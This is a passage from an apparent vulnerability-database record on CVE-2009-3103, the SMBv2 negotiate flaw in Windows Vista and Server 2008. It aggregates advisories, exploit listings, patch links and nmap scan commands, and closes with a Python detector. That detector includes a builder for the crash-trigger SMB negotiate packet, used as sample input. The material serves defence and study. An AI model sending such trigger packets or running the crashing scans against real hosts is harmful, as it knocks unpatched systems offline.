Remote exploit for windows platform", "published": "2010-08-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/14674/", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2016-02-01T20:20:26"}], "packetstorm": [{"id": "PACKETSTORM:86712", "type": "packetstorm", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "", "published": "2010-02-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/86712/Microsoft-SRV2.SYS-SMB-Negotiate-ProcessID-Function-Table-Dereference.html", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-12-05T22:12:29"}, {"id": "PACKETSTORM:81723", "type": "packetstorm", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "", "published": "2009-09-29T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/81723/Microsoft-SRV2.SYS-SMB-Negotiate-ProcessID-Function-Table-Dereference.html", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-12-05T22:13:35"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_FUNC_INDEX", "type": "metasploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. 
Windows Vista without SP1 does not seem affected by this flaw.", "published": "2010-02-26T13:42:17", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-11T14:21:48"}, {"id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_PIDHIGH", "type": "metasploit", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.", "published": "2010-04-15T16:08:27", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-11-07T01:42:07"}, {"id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_SESSION_LOGOFF", "type": "metasploit", "title": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. 
Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", "published": "2010-04-15T16:08:27", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-11-19T13:43:41"}], "seebug": [{"id": "SSV:12474", "type": "seebug", "title": "Microsoft Windows SMBv2 Negotiation Remote Code Execution Vulnerability (MS09-050)", "description": "Bugtraq ID: 36299\r\nCVE ID: CVE-2009-3103\r\n\r\nMicrosoft Windows is a popular operating system.\r\nMicrosoft Windows SMB2 is the SMB protocol implementation bundled with newer versions of Windows. The SRV2.SYS driver incorrectly handles malformed SMB header field data sent in a NEGOTIATE PROTOCOL REQUEST. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server; it identifies the SMB dialect to be used for the rest of the conversation.\r\nA remote attacker can construct an SMB packet whose Process Id High header field contains the \"&\" character and send it to an affected system, causing a blue-screen crash and a denial of service.\r\nThis vulnerability requires no authentication.\n\nMicrosoft Windows Vista x64 Edition SP2\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP2\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP1\r\nMicrosoft Windows Vista Ultimate 64-bit edition 0\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP2\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP1\r\nMicrosoft Windows Vista Home Premium 64-bit edition 0\r\nMicrosoft Windows 
Vista Home Basic 64-bit edition SP2\r\nMicrosoft Windows Vista Home Basic 64-bit edition SP1\r\nMicrosoft Windows Vista Home Basic 64-bit edition 0\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP2\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP1\r\nMicrosoft Windows Vista Enterprise 64-bit edition 0\r\nMicrosoft Windows Vista Business 64-bit edition SP2\r\nMicrosoft Windows Vista Business 64-bit edition SP1\r\nMicrosoft Windows Vista Business 64-bit edition 0\r\nMicrosoft Windows Vista Ultimate SP2\r\nMicrosoft Windows Vista Ultimate SP1\r\nMicrosoft Windows Vista Ultimate\r\nMicrosoft Windows Vista Home Premium SP2\r\nMicrosoft Windows Vista Home Premium SP1\r\nMicrosoft Windows Vista Home Premium\r\nMicrosoft Windows Vista Home Basic SP2\r\nMicrosoft Windows Vista Home Basic SP1\r\nMicrosoft Windows Vista Home Basic\r\nMicrosoft Windows Vista Enterprise SP2\r\nMicrosoft Windows Vista Enterprise SP1\r\nMicrosoft Windows Vista Enterprise\r\nMicrosoft Windows Vista Business SP2\r\nMicrosoft Windows Vista Business SP1\r\nMicrosoft Windows Vista Business\r\nMicrosoft Windows Server 2008 Standard Edition SP2\r\nMicrosoft Windows Server 2008 Standard Edition 0\r\nMicrosoft Windows Server 2008 for x64-based Systems SP2\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Windows Server 2008 for Itanium-based Systems SP2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Windows Server 2008 for 32-bit Systems SP2\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Windows Server 2008 Enterprise Edition SP2\r\nMicrosoft Windows Server 2008 Enterprise Edition 0\r\nMicrosoft Windows Server 2008 Datacenter Edition SP2\r\nMicrosoft Windows Server 2008 Datacenter Edition 0\r\nMicrosoft Windows 7 RC\r\nMicrosoft Windows 7 beta\nVendor solution\r\nUsers can refer to the following vendor-supplied security patches:\r\nMicrosoft Windows Server 2008 
for x64-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=aff6f9c7-4a72-48f2-b750-204d796c7daa\r\nMicrosoft Windows Server 2008 for Itanium-based Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 for Itanium-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=7b70108b-7f59-4898-ab4e-76be990de878\r\nMicrosoft Windows Server 2008 for 32-bit Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=ff6bfcf3-76c9-4c45-b57d-22f94458dd6e\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6-4942-80c9-7808b14cb6b5\r\nMicrosoft Windows Server 2008 for x64-based Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=aff6f9c7-4a72-48f2-b750-204d796c7daa\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 for Itanium-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=7b70108b-7f59-4898-ab4e-76be990de878\r\nMicrosoft Windows Vista x64 Edition SP2\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6-4942-80c9-7808b14cb6b5\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Security Update for Windows Server 2008 (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=ff6bfcf3-76c9-4c45-b57d-22f94458dd6e\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems 
(KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6-4942-80c9-7808b14cb6b5", "published": "2009-10-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-12474", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-11-19T18:34:10"}], "threatpost": [{"id": "MICROSOFT-CONFIRMS-SMB2-FLAW-HEIGHTENS-SEVERITY-091109/72229", "type": "threatpost", "title": "Microsoft Confirms SMB2 Flaw, Heightens Severity", "description": "Microsoft has issued a formal security advisory to confirm the [remote reboot flaw in its implementation of the SMB2 protocol](<https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/>), going a step further to warn that a successful attack could lead to remote code execution and full system takeover.\n\nThe vulnerability, which was originally released as a denial-of-service issue, does not affect the RTM version of Windows 7, Microsoft said. 
It appears [Microsoft fixed the flaw](<http://twitter.com/jness/statuses/3856921104>) in Windows 7 build ~7130, just after RC1. Windows Vista and Windows Server 2003 users remain at risk.\n\nThe Microsoft [advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>) is somewhat confusing. It mentions the plural \u201cvulnerabilities\u201d in the title but later warns of \u201ca possible vulnerability in Microsoft Server Message Block (SMB) implementation.\u201d\n\nIt is, however, very clear about the risk severity:\n\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. Most attempts to exploit this vulnerability will cause an affected system to stop responding and restart.\n\nMicrosoft points to [this CVE entry](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) to explain the actual bug:\n\nArray index error in the SMB2 protocol implementation in srv2.sys in Microsoft Windows 7, Server 2008, and Vista Gold, SP1, and SP2 allows remote attackers to cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location.\n\nProof of concept code, which allows an attacker to remotely crash any vulnerable machine with SMB enabled, is publicly available.\n\nIn the absence of a patch, Microsoft recommends that users disable SMB v2 and block TCP ports 139 and 445 at the firewall.", "published": "2009-09-11T12:12:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/72229/", 
"cvelist": ["CVE-2009-3103"], "lastseen": "2016-09-04T20:48:48"}, {"id": "MICROSOFT-SHIPS-TEMPORARY-FIX-IT-CRITICAL-VISTA-FLAW-092309/72219", "type": "threatpost", "title": "Microsoft Ships Temporary Fix-It for Critical Vista Flaw", "description": "[](<https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/>)\n\nWith [exploit code in circulation](<https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/>) and facing a race against time to fix the SMB v2 vulnerability haunting Windows Vista and Windows Server 2008, Microsoft today shipped a one-click \u201cfix-it\u201d workaround to help users avoid malicious hacker attacks.\n\n### Related Posts\n\n#### [AutoRun Infections Plummet Following Upgrade](<https://threatpost.com/autorun-infections-plummet-following-upgrade-061511/75336/> \"Permalink to AutoRun Infections Plummet Following Upgrade\" )\n\nJune 15, 2011 , 4:00 pm\n\n#### [Microsoft Warns Of Security Hole in Windows Graphics Engine](<https://threatpost.com/microsoft-warns-security-hole-windows-graphics-engine-010411/74820/> \"Permalink to Microsoft Warns Of Security Hole in Windows Graphics Engine\" )\n\nJanuary 4, 2011 , 7:52 pm\n\n#### [Microsoft Ships Anti-Exploit Tool for IT Admins](<https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/74268/> \"Permalink to Microsoft Ships Anti-Exploit Tool for IT Admins\" )\n\nJuly 28, 2010 , 6:54 pm\n\nThe fix-it package, which was added to Redmond\u2019s pre-patch [advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>), effectively disables SMBv2 and then stops and starts the Server service. 
It provides temporary mitigation from remote code execution attacks targeting the known \u2014 and still unpatched \u2014 vulnerability.\n\nMicrosoft cautioned that disabling SMBv2 may slow down SMB connections between Windows Vista and Windows Server 2008 machines.\n\nThe company also [confirmed](<http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx>) that the exploit code released into Immunity\u2019s Canvas pen-testing platform works as advertised:\n\n_We have analyzed the code ourselves and can confirm that it works reliably against 32-bit Windows Vista and Windows Server 2008 systems. The exploit gains complete control of the targeted system and can be launched by an unauthenticated user._\n\n_The exploit can be detected by intrusion detection systems (IDS) and firewalls that have signatures for the vulnerability being targeted (CVE-2009-3103)._\n\n_This exploit code from Immunity is only available to a small group of companies and organizations who will use it to determine the risk to their own networks and systems, or those of their customers. (We are aware that other groups are actively working on exploit code which is likely to be made public when it is completed)._\n\nIf reliable exploit code is released to the general public \u2014 [a strong likelihood](<http://metasploit.com>) \u2014 it\u2019s only a matter of time before malicious hacker attacks surface in the wild. In the meantime, it\u2019s incumbent on Microsoft to ship an out-of-band patch as soon as possible.\n\nMicrosoft\u2019s Jonathan Ness hinted that an emergency patch may be forthcoming but it depends entirely on how soon the patch can pass quality assurance testing:\n\n_[We\u2019re] not slowing down our investigation, and are working on an update that can be delivered for all customers. 
The product team has built packages and are hard-at-work testing now to ensure quality. It takes more testing than you might think to release a quality update. For this update, the product team has so far already completed over 10,000 separate test cases in their regression testing. They are now in stress testing, 3rd-party application testing, and fuzzing. We\u2019d sure like to complete all that testing before the update needs to be released. We are keeping a close eye on the changing landscape and balancing this against the remaining test actions to determine the best ship schedule to bring a quality update to customers._\n\nIn the absence of a patch, here\u2019s what you can do:\n\n * [Click Here To Disable SMBv2](<http://go.microsoft.com/?linkid=9683379>)\n\nTo revert the workaround, and re-enable SMBv2, you can:\n\n * [Click Here To Re-Enable SMBv2](<http://go.microsoft.com/?linkid=9685006>)\n\nMitigation guidance for enterprises is available in [this blog post](<http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx>) and in the [Microsoft security advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>).", "published": "2009-09-23T22:39:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/72219/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-09-04T20:52:53"}], "nmap": [{"id": "NMAP:SMB-VULN-CVE2009-3103.NSE", "type": "nmap", "title": "smb-vuln-cve2009-3103 NSE Script", "description": "Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable. \n\nThe script performs a denial-of-service against the vulnerability disclosed in CVE-2009-3103. This works against Windows Vista and some versions of Windows 7, and causes a bluescreen if successful. 
The proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used, with one small change. \n\nThis check was previously part of smb-check-vulns.\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script smb-vuln-cve2009-3103.nse -p445 <host>\n nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-cve2009-3103:\n | VULNERABLE:\n | SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n | State: VULNERABLE\n | IDs: CVE:CVE-2009-3103\n | Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,\n | Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a\n | denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE\n | PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,\n | aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.\n |\n | Disclosure date: 2009-09-08\n | References:\n | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n \n\n## Requires \n\n * nmap\n * smb\n * stdnse\n * table\n * vulns\n\n* * *\n", "published": "2015-10-03T06:07:49", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://nmap.org/nsedoc/scripts/smb-vuln-cve2009-3103.html", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-08-15T15:15:46"}], "nessus": [{"id": 
"SMB2_PID_HIGH_VULN.NASL", "type": "nessus", "title": "MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (EDUCATEDSCHOLAR) (uncredentialed check)", "description": "The remote host is running a version of Microsoft Windows Vista or Windows Server 2008 that contains a vulnerability in its SMBv2 implementation. An attacker can exploit this flaw to disable the remote host or to execute arbitrary code on it.\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers.", "published": "2009-09-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40887", "cvelist": ["CVE-2009-2532", "CVE-2009-3103"], "lastseen": "2017-10-29T13:35:39"}, {"id": "SMB_NT_MS09-050.NASL", "type": "nessus", "title": "MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) (EDUCATEDSCHOLAR)", "description": "The remote Windows host contains a vulnerable SMBv2 implementation with the following issues :\n\n - A specially crafted SMBv2 packet can cause an infinite loop in the Server service. A remote, unauthenticated attacker can exploit this to cause a denial of service. (CVE-2009-2526)\n\n - Sending a specially crafted SMBv2 packet to the Server service can result in code execution. A remote, unauthenticated attacker can exploit this to take complete control of the system. 
(CVE-2009-2532, CVE-2009-3103) (EDUCATEDSCHOLAR)\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers.", "published": "2009-10-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=42106", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2017-10-29T13:39:39"}], "zdt": [{"id": "1337DAY-ID-25384", "type": "zdt", "title": "Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2016-02-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://0day.today/exploit/description/25384", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2018-02-20T05:22:09"}]}}
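Several of the entries above (the CVE text quoted by Threatpost, the Seebug write-up, the nmap script and Microsoft's own note that IDS signatures for CVE-2009-3103 exist) describe the same on-the-wire indicator: an SMB1 NEGOTIATE PROTOCOL REQUEST (command 0x72) whose Process ID High header field carries the '&' (0x26) byte, which srv2.sys then uses as an out-of-bounds function-table index. The following is an added example, not code from any of the listed advisories, tools or exploits: a small parser that decodes the NetBIOS session and 32-byte SMB1 header and flags that indicator, so a responder can check a capture without sending anything to a host. It goes slightly beyond the entries by also reporting SMB2-framed and non-session frames and by treating any non-zero Process ID High on a negotiate as worth review; that last heuristic, the flags/flags2/PID values in the constructed sample frames, and the header layout (taken from MS-CIFS) are assumptions of this example rather than anything the listing states.

```python
"""
Added example (not from any advisory or tool listed above): detect the
CVE-2009-3103 trigger, an SMB1 NEGOTIATE (0x72) whose Process ID High
field carries the '&' (0x26) byte.  Header layout follows MS-CIFS; the
sample frames below are constructed here, with typical client values.
"""
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
AMPERSAND = 0x26             # the byte the CVE text names in Process ID High
NBSS_SESSION_MESSAGE = 0x00


def parse_netbios_session(frame: bytes):
    """Split a NetBIOS Session Service frame into (message type, payload)."""
    if len(frame) < 4:
        raise ValueError("short NetBIOS session header")
    msg_type = frame[0]
    length = int.from_bytes(frame[1:4], "big") & 0x1FFFF
    payload = frame[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated NetBIOS payload")
    return msg_type, payload


def parse_smb1_header(smb: bytes) -> dict:
    """Decode the fixed 32-byte SMB1 header (layout per MS-CIFS)."""
    if len(smb) < 32 or smb[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 header")
    (command, status, flags, flags2, pid_high, signature, _reserved,
     tid, pid_low, uid, mid) = struct.unpack("<BIBHH8sHHHHH", smb[4:32])
    return {
        "command": command, "status": status, "flags": flags, "flags2": flags2,
        "pid_high": pid_high,          # little-endian value of bytes 12..13
        "pid_high_raw": smb[12:14],    # raw bytes, for the byte-level check
        "signature": signature, "tid": tid, "pid_low": pid_low,
        "uid": uid, "mid": mid,
    }


def inspect(frame: bytes) -> dict:
    """Classify one client-to-server frame and return a verdict dictionary."""
    verdict = {"command": None, "pid_high": None, "suspicious": False, "reason": ""}
    try:
        msg_type, smb = parse_netbios_session(frame)
    except ValueError as exc:
        verdict["reason"] = str(exc)
        return verdict
    if msg_type != NBSS_SESSION_MESSAGE:
        verdict["reason"] = "not a NetBIOS session message"
        return verdict
    if smb[:4] == SMB2_MAGIC:
        verdict["reason"] = "SMB2 header; the trigger rides on an SMB1 negotiate"
        return verdict
    try:
        hdr = parse_smb1_header(smb)
    except ValueError as exc:
        verdict["reason"] = str(exc)
        return verdict
    verdict["command"] = hdr["command"]
    verdict["pid_high"] = hdr["pid_high"]
    if hdr["command"] != SMB_COM_NEGOTIATE:
        verdict["reason"] = "not a NEGOTIATE request"
    elif AMPERSAND in hdr["pid_high_raw"]:
        verdict["suspicious"] = True
        verdict["reason"] = "CVE-2009-3103 indicator: '&' in Process ID High of NEGOTIATE"
    elif hdr["pid_high"] != 0:
        # Assumption of this example: ordinary clients send Process ID High = 0
        # on the very first request, so anything else deserves a look.
        verdict["suspicious"] = True
        verdict["reason"] = "non-zero Process ID High in NEGOTIATE; review"
    else:
        verdict["reason"] = "ordinary NEGOTIATE"
    return verdict


def build_negotiate(pid_high: bytes, dialects=(b"NT LM 0.12", b"SMB 2.002")) -> bytes:
    """Construct a minimal SMB1 NEGOTIATE request inside a NetBIOS session
    frame.  Used only to produce sample input for the detector."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)    # dialect strings
    header = (SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE])
              + b"\x00\x00\x00\x00"                     # NT status
              + b"\x18" + struct.pack("<H", 0xC853)     # flags, flags2 (typical values)
              + pid_high                                # Process ID High, bytes 12..13
              + b"\x00" * 8 + b"\x00\x00"               # signature, reserved
              + struct.pack("<HHHH", 0, 0xFEFF, 0, 0))  # tid, pid_low, uid, mid
    body = b"\x00" + struct.pack("<H", len(data)) + data   # word count, byte count
    smb = header + body
    return bytes([NBSS_SESSION_MESSAGE]) + len(smb).to_bytes(3, "big") + smb


# Constructed sample traffic: one ordinary negotiate, one carrying the trigger.
BENIGN_NEGOTIATE = build_negotiate(b"\x00\x00")
TRIGGER_NEGOTIATE = build_negotiate(b"\x00\x26")


def scan(frames):
    """Verdicts for a sequence of frames, e.g. TCP/445 payloads from a pcap."""
    return [inspect(f) for f in frames]


if __name__ == "__main__":
    for name, frame in (("benign", BENIGN_NEGOTIATE), ("trigger", TRIGGER_NEGOTIATE)):
        v = inspect(frame)
        print(f"{name:8s} cmd=0x{v['command']:02x} pid_high=0x{v['pid_high']:04x} "
              f"suspicious={v['suspicious']} ({v['reason']})")
```

The byte-level check (`0x26 in smb[12:14]`) rather than a comparison against a single decoded value is deliberate: the field is two bytes and the public proof-of-concept places the ampersand in the high byte, so the decoded little-endian value is 0x2600, which is easy to get wrong when writing a signature from the CVE prose alone. Feed `scan()` the TCP payloads of port 445/139 sessions and act on the `suspicious` verdicts; the MS09-050 patch, or the advisory's SMBv2-disable workaround, remains the fix.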